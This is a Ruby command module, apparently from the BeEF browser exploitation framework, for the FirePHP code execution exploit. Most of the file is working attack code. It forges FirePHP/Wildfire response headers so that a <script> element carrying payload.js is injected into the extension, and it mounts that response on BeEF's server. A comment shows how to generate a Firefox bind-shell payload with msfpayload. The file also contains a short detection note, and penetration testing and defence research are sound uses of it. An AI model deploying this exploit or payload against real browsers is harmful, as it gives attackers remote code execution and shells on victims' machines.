#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
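class Firephp_code_exec < BeEF::Core::Command
  # Number of filler entries placed in the Wildfire 'RequestHeaders' map
  # before the entry that carries the script element.
  FILLER_HEADER_COUNT = 9

  # Builds the exploit response and mounts it on BeEF's asset handler before
  # the command is sent to the hooked browser.
  #
  # The mounted response mimics a FirePHP/Wildfire protocol message: the
  # X-Wf-* headers advertise the protocol, plugin and structure, and the
  # X-Wf-1-1-1-1 header carries one JSON-encoded message whose
  # 'RequestHeaders' map contains a <script> element holding payload.js.
  # (Presumably the FirePHP extension renders that header value without
  # escaping; see the advisory linked in the file header — not verifiable
  # from this file alone.)
  #
  # Detection note: a response combining X-Wf-Protocol-1 / X-Wf-1-Plugin-1 /
  # X-Wf-1-Structure-1 headers with a '<script>' key inside the JSON stream
  # is distinctive and can be matched on the wire or in proxy logs.
  #
  # @return [void]
  def pre_send
    # Random token used as the HTTP body and as the value paired with the
    # injected <script> key. Not security-sensitive, so Kernel#rand is fine.
    rand_str = rand(32**10).to_s(32)

    # load payload.js file
    # generate payload:
    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
    #
    # File.read yields the same bytes as the former each_line/<< loop but
    # closes the handle even when reading raises (the former File.open /
    # each_line / close sequence leaked the descriptor on error).
    # $root_dir is BeEF's global install path, set elsewhere in the framework.
    payload = File.read("#{$root_dir}/modules/exploits/firephp/payload.js")

    # construct exploit+payload HTTP response
    # Hash insertion order is preserved by Ruby and hence by to_json, so the
    # nine filler entries precede the script entry exactly as before.
    filler = (1..FILLER_HEADER_COUNT).to_h { |i| [i.to_s, rand(10).to_s] }
    request_headers = filler.merge("<script>#{payload}<\/SCRIPT>" => rand_str)
    exploit = { 'RequestHeaders' => request_headers }.to_json

    # mount exploit+payload at /firephp
    # @todo use Router class instead of bind_raw()
    # X-Wf-1-1-1-1 follows the Wildfire framing visible here: "<length>|<json>|".
    # exploit.length is the character count, kept as-is for behavioural parity.
    response_headers = {
      'Content-Type' => 'text/html',
      'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
      'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
      'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
      'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
    }
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
      '200',
      response_headers,
      rand_str,   # HTTP body
      '/firephp', # URI mount point
      -1          # mount lifetime; -1 presumably means "do not expire" — confirm in AssetHandler
    )
  end

  # Persists the result reported back by the hooked browser.
  # `save` and `@datastore` are provided by BeEF::Core::Command (not visible here).
  #
  # @return [void]
  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end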
